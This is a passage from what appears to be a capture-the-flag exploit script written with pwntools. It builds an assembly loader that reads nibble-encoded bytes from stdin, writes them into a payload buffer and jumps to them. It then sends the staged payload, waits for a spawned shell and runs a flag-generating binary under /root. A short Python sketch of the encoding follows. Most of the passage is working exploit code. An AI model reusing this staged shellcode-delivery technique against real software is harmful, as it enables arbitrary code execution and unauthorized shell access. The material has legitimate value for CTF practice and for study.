  xor rbx, rbx
LOAD:
  // get two characters (one byte)
  push 0
  {shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
  cmp rax, 2
  jl FAIL
  pop rax
  sub ah, 0x41 
  sub al, 0x41 
  shl al, 2
  shl al, 2
  shr rax, 2
  shr rax, 2
  mov BYTE PTR [rbx+{PAYLOAD}], al
  inc rbx
  cmp rbx, {PAYLOAD_LEN}
  jb LOAD

  // jmp to next stage
  mov rax, {PAYLOAD+0x8}
  jmp rax

FAIL:
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
  int 3
"""))

assert all(bad not in loader for bad in b"\x04\n"), "can't have certain escape chars"

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
#  hex starting a 'A'
#  and least significant nibble first

payload_enc = b''
for b in payload:
  lo = (b & 0xf) + 0x41
  hi = ((b & 0xf0) >> 4) + 0x41
  payload_enc += bytes((lo, hi))

linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))

ru("STAGE 4")

context.newline = b'\r\n'

while (out := rl().rstrip()) != b'[+] spawning shell':
  pass  # discard output until the shell marker shows up


# FINAL STAGE: GET FLAG                     #

linfo("FINAL STAGE")

sl('echo PWND')
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')

it() # or t.interactive()
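The custom encoding between STAGE 3 and STAGE 4 (one byte becomes two letters, low nibble first, each offset by 'A') can be checked offline before sending anything. A minimal sketch: encode mirrors the loop in the script above, while decode is a hypothetical Python model of what the loader's sub/shl/shr sequence computes.

```python
def encode(payload: bytes) -> bytes:
    """Two letters per byte: low nibble first, each nibble offset by 'A'."""
    out = bytearray()
    for b in payload:
        out.append((b & 0xF) + 0x41)
        out.append((b >> 4) + 0x41)
    return bytes(out)


def decode(enc: bytes) -> bytes:
    """Model of the loader: al holds the first char, ah the second."""
    out = bytearray()
    for i in range(0, len(enc), 2):
        lo = enc[i] - 0x41
        hi = enc[i + 1] - 0x41
        out.append((hi << 4) | lo)
    return bytes(out)


sample = bytes(range(256))
enc = encode(sample)
roundtrip = decode(enc)

print(enc[:8], roundtrip == sample)
```

Every encoded byte falls in the range 'A' to 'P', so the payload itself can never contain the control characters (such as "\x04" or "\n") that the loader has to avoid.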
